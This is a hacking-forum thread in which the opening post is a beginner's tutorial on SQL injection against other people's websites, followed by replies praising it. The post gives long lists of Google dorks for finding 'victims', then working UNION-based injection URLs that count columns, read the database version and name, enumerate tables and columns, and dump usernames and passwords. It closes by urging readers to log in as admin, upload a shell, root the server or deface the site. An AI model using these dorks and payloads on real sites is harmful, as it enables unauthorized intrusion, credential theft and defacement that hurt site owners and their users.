Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[SQLi] Beginners tutorial to SQL Injection
#1
Well, i thought i could write a tutorial about this.
So lets begin:
Finding a vulnerable Site.
So you want to hack a site. Well first you need to find one to attack. For this you will need what is called a 'Google Dork'. Below is a small example of one of these.
[spoiler]
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurlConfusedhow.php?id=
inurlConfusedtaff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurlConfusedw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurlConfusedql.php?id=
inurl:news_view.php?id=
inurlConfusedelect_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurlConfusedem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurlConfusedhow_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurlConfusedpr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurlConfusedhowimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurlConfusedhop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurlConfusedhopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurlConfusedection.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurlConfusedhredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurlConfusedhop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurlConfusedql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurlConfusedtory.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

ASP DORK
nurl:”add.asp?bookid=”
inurl:”add_cart.asp?num=”
inurl:”addcart.asp?”
inurl:”addItem.asp”
inurl:”add-to-cart.asp?ID=”
inurl:”addToCart.asp?idProduct=”
inurl:”addtomylist.asp?ProdId=”
inurl:”adminEditProductFields.asp?intProdID=”
inurl:”advSearch_h.asp?idCategory=”
inurl:”affiliate.asp?ID=”
inurl:”affiliate-agreement.cfm?storeid=”
inurl:”affiliates.asp?id=”
inurl:”ancillary.asp?ID=”
inurl:”archive.asp?id=”
inurl:”article.asp?id=”
inurl:”aspx?PageID”
inurl:”basket.asp?id=”
inurl:”Book.asp?bookID=”
inurl:”book_list.asp?bookid=”
inurl:”book_view.asp?bookid=”
inurl:”BookDetails.asp?ID=”
inurl:”browse.asp?catid=”
inurl:”browse_item_details.asp”
inurl:”Browse_Item_Details.asp?Store_Id=”
inurl:”buy.asp?”
inurl:”buy.asp?bookid=”
inurl:”bycategory.asp?id=”
inurl:”cardinfo.asp?card=”
inurl:”cart.asp?action=”
inurl:”cart.asp?cart_id=”
inurl:”cart.asp?id=”
inurl:”cart_additem.asp?id=”
inurl:”cart_validate.asp?id=”
inurl:”cartadd.asp?id=”
inurl:”cat.asp?iCat=”
inurl:”catalog.asp”
inurl:”catalog.asp?CatalogID=”
inurl:”catalog_item.asp?ID=”
inurl:”catalog_main.asp?catid=”
inurl:”category.asp”
inurl:”category.asp?catid=”
inurl:”category_list.asp?id=”
inurl:”categorydisplay.asp?catid=”
inurl:”checkout.asp?cartid=”
inurl:”checkout.asp?UserID=”
inurl:”checkout_confirmed.asp?order_id=”
inurl:”checkout1.asp?cartid=”
inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
inurl:”comersus_optReviewReadExec.asp?idProduct=”
inurl:”comersus_viewItem.asp?idProduct=”
inurl:”comments_form.asp?ID=”
inurl:”contact.asp?cartId=”
inurl:”content.asp?id=”
inurl:”customerService.asp?TextID1=”
inurl:”default.asp?catID=”
inurl:”description.asp?bookid=”
inurl:”details.asp?BookID=”
inurl:”details.asp?Press_Release_ID=”
inurl:”details.asp?Product_ID=”
inurl:”details.asp?Service_ID=”
inurl:”display_item.asp?id=”
inurl:”displayproducts.asp”
inurl:”downloadTrial.asp?intProdID=”
inurl:”emailproduct.asp?itemid=”
inurl:”emailToFriend.asp?idProduct=”
inurl:”events.asp?ID=”
inurl:”faq.asp?cartID=”
inurl:”faq_list.asp?id=”
inurl:”faqs.asp?id=”
inurl:”feedback.asp?title=”
inurl:”freedownload.asp?bookid=”
inurl:”fullDisplay.asp?item=”
inurl:”getbook.asp?bookid=”
inurl:”GetItems.asp?itemid=”
inurl:”giftDetail.asp?id=”
inurl:”help.asp?CartId=”
inurl:”home.asp?id=”
inurl:”index.asp?cart=”
inurl:”index.asp?cartID=”
inurl:”index.asp?ID=”
inurl:”info.asp?ID=”
inurl:”item.asp?eid=”
inurl:”item.asp?item_id=”
inurl:”item.asp?itemid=”
inurl:”item.asp?model=”
inurl:”item.asp?prodtype=”
inurl:”item.asp?shopcd=”
inurl:”item_details.asp?catid=”
inurl:”item_list.asp?maingroup”
inurl:”item_show.asp?code_no=”
inurl:”itemDesc.asp?CartId=”
inurl:”itemdetail.asp?item=”
inurl:”itemdetails.asp?catalogid=”
inurl:”learnmore.asp?cartID=”
inurl:”links.asp?catid=”
inurl:”list.asp?bookid=”
inurl:”List.asp?CatID=”
inurl:”listcategoriesandproducts.asp?idCategory=”
inurl:”modline.asp?id=”
inurl:”myaccount.asp?catid=”
inurl:”news.asp?id=”
inurl:”order.asp?BookID=”
inurl:”order.asp?id=”
inurl:”order.asp?item_ID=”
inurl:”OrderForm.asp?Cart=”
inurl:”page.asp?PartID=”
inurl:”payment.asp?CartID=”
inurl:”pdetail.asp?item_id=”
inurl:”powersearch.asp?CartId=”
inurl:”privacy.asp?cartID=”
inurl:”prodbycat.asp?intCatalogID=”
inurl:”prodetails.asp?prodid=”
inurl:”prodlist.asp?catid=”
inurl:”product.asp?bookID=”
inurl:”product.asp?intProdID=”
inurl:”product_info.asp?item_id=”
inurl:”productDetails.asp?idProduct=”
inurl:”productDisplay.asp”
inurl:”productinfo.asp?item=”
inurl:”productlist.asp?ViewType=Category&CategoryID= “
inurl:”productpage.asp”
inurl:”products.asp?ID=”
inurl:”products.asp?keyword=”
inurl:”products_category.asp?CategoryID=”
inurl:”products_detail.asp?CategoryID=”
inurl:”productsByCategory.asp?intCatalogID=”
inurl:”prodView.asp?idProduct=”
inurl:”promo.asp?id=”
inurl:”promotion.asp?catid=”
inurl:”pview.asp?Item=”
inurl:”resellers.asp?idCategory=”
inurl:”results.asp?cat=”
inurl:”savecart.asp?CartId=”
inurl:”search.asp?CartID=”
inurl:”searchcat.asp?search_id=”

inurl:”Select_Item.asp?id=”
inurl:”Services.asp?ID=”
inurl:”shippinginfo.asp?CartId=”
inurl:”shop.asp?a=”
inurl:”shop.asp?action=”
inurl:”shop.asp?bookid=”
inurl:”shop.asp?cartID=”
inurl:”shop_details.asp?prodid=”
inurl:”shopaddtocart.asp”
inurl:”shopaddtocart.asp?catalogid=”
inurl:”shopbasket.asp?bookid=”
inurl:”shopbycategory.asp?catid=”
inurl:”shopcart.asp?title=”
inurl:”shopcreatorder.asp”
inurl:”shopcurrency.asp?cid=”
inurl:”shopdc.asp?bookid=”
inurl:”shopdisplaycategories.asp”
inurl:”shopdisplayproduct.asp?catalogid=”
inurl:”shopdisplayproducts.asp”
inurl:”shopexd.asp”
inurl:”shopexd.asp?catalogid=”
inurl:”shopping_basket.asp?cartID=”
inurl:”shopprojectlogin.asp”
inurl:”shopquery.asp?catalogid=”
inurl:”shopremoveitem.asp?cartid=”
inurl:”shopreviewadd.asp?id=”
inurl:”shopreviewlist.asp?id=”
inurl:”ShopSearch.asp?CategoryID=”
inurl:”shoptellafriend.asp?id=”
inurl:”shopthanks.asp”
inurl:”shopwelcome.asp?title=”
inurl:”show_item.asp?id=”
inurl:”show_item_details.asp?item_id=”
inurl:”showbook.asp?bookid=”
inurl:”showStore.asp?catID=”
inurl:”shprodde.asp?SKU=”
inurl:”specials.asp?id=”
inurl:”store.asp?id=”
inurl:”store_bycat.asp?id=”
inurl:”store_listing.asp?id=”
inurl:”Store_ViewProducts.asp?Cat=”
inurl:”store-details.asp?id=”
inurl:”storefront.asp?id=”
inurl:”storefronts.asp?title=”
inurl:”storeitem.asp?item=”
inurl:”StoreRedirect.asp?ID=”
inurl:”subcategories.asp?id=”
inurl:”tek9.asp?”
inurl:”template.asp?Action=Item&pid=”
inurl:”topic.asp?ID=”
inurl:”tuangou.asp?bookid=”
inurl:”type.asp?iType=”
inurl:”updatebasket.asp?bookid=”
inurl:”updates.asp?ID=”
inurl:”view.asp?cid=”
inurl:”view_cart.asp?title=”
inurl:”view_detail.asp?ID=”
inurl:”viewcart.asp?CartId=”
inurl:”viewCart.asp?userID=”
inurl:”viewCat_h.asp?idCategory=”
inurl:”viewevent.asp?EventID=”
inurl:”viewitem.asp?recor=”
inurl:”viewPrd.asp?idcategory=”
inurl:”ViewProduct.asp?misc=”
inurl:”voteList.asp?item_ID=”
inurl:”whatsnew.asp?idCategory=”
inurl:”WsAncillary.asp?ID=”



--------------------------------------------------------------------------------
SQL DORK

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurlSad0x3a,version
[email protected],0x3a,databse)
inurlSaduser,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurlConfusedhow.php?id=
inurlConfusedtaff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=[/spoiler]
You will need to search these in google to find your victims site...

Testing for A Vulnerablity
Okay, so you have your site and you want to see if its vulnerable. What do?
well that's simple! all you have to do is take your url and add an apostrophe.
for example:
[spoiler]
https://site.com/store.php?id=4
turns into
https://site.com/store.php?id=4'
If you get an error from that, you have a vulnerable site.
[/spoiler]
Finding the number of columns
Right, Now we get moving. You now need to find the number of columns...
Here's how we do this:
[spoiler]
https://site.com/store.php?id=4 order by 2-- (No Error)
https://site.com/store.php?id=4 order by 3-- (No Error)
https://site.com/store.php?id=4 order by 4-- (NO Error)
https://site.com/store.php?id=4 order by 5-- (Error)
Now we get an error on 5. This Means there are 4 columns.
[/spoiler]
Finding the Vulnerable Column
[spoiler]
So now we know how many columns there are we need to find the Vulnerable column.
Here's how we do this:
https://site.com/store.php?id=-4 UNION SELECT 1,2,3,4--
(We have to remember to add the hyphen after the id= or the site will return a normal page)

A Number (or a few)should show up in the browser. Take the biggest one and that's the vulnerable column.
for example purposed lets say i got 2.[/spoiler]
Finding the Database Version
Now We need to know the database version. Here's how we do it:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,@@version,3,4--
The database version should now be displayed in the browser.[/spoiler]
Finding the database name
Now we have the version we need the DBname. To get this we enter:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,concat(database()),3,4--
Now we should have the DBname in browser.[/spoiler]

Finding the tables
Now we need to find the tables. This is how you can do it:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
Now we should have the names of the tables.[/spoiler]
Viewing the tables Informtion
Now we want the information so we enter this into the URL:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="userinfo"

This will Probably return an error. If it does, never fear! find a string to hex converter and convert to hex. Use something like http://www.string-functions.com

For example mine would become this:
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x75736572696e666f0d0a

You MUST! add the 0x or the server wont know it's a command.[/spoiler]
Displaying The tables Contents
Now you want to see the contents. so enter this:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(user,0x3a,password),3,4 FROM DBname.userinfo--[/spoiler]
Now all you need to do is find the admin login page and you're in! Upload a Shell, r00t the server, deface the site... whatever you want.
This should get you going in the world of SQLi Smile
Reply
#2
Nice detailed tutorial! Shows of SQLi very well.

Good Job!
-Siberia
PacketPunks
Knowledge talks, wisdom listens.
PM me with any questions or comments
Reply
#3
Thanks for the great ass tutorial man
Reply
#4
Manual SQLi is always the best! Screw all of these tools.
Do NOT PM me for any inquiries related to advertising on PacketPunks. 

For our change log, CLICK HERE.
For our help docs, CLICK HERE.
Reply
#5
(03-17-2014, 06:59 AM)Schultz Wrote: Manual SQLi is always the best! Screw all of these tools.

meeeh i dont fully agree with this, manual sqli, is really good.
but if i want to speed up things i rather use SQLMAP,
its just alot faster, if u need to dump a database :devil:

thanks for sharing the tutorial, its good for the beginners to SQLinjection
Knowledge is Power 龙
[Image: 2zss9s6.png]
Reply
#6
Great post! Really beginner-friendly. Thanks for posting, I will definitely have to try this out.
[Image: 2mwp4dd.jpg]
Reply
#7
This is a really good tutorial for newbies (like me) I've never got into exploiting vulns, all I've did in "hacking" was to manipulate the users to give me access to their servers, websites and upload a shell :hehe!:
[Image: 0sPWRRx.gif]
Reply
#8
This is a very detailed post, great for those beginners!
Reply
#9
Great share for begineers as Leedle said.
Do NOT PM me for any inquiries related to advertising on PacketPunks. 

For our change log, CLICK HERE.
For our help docs, CLICK HERE.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)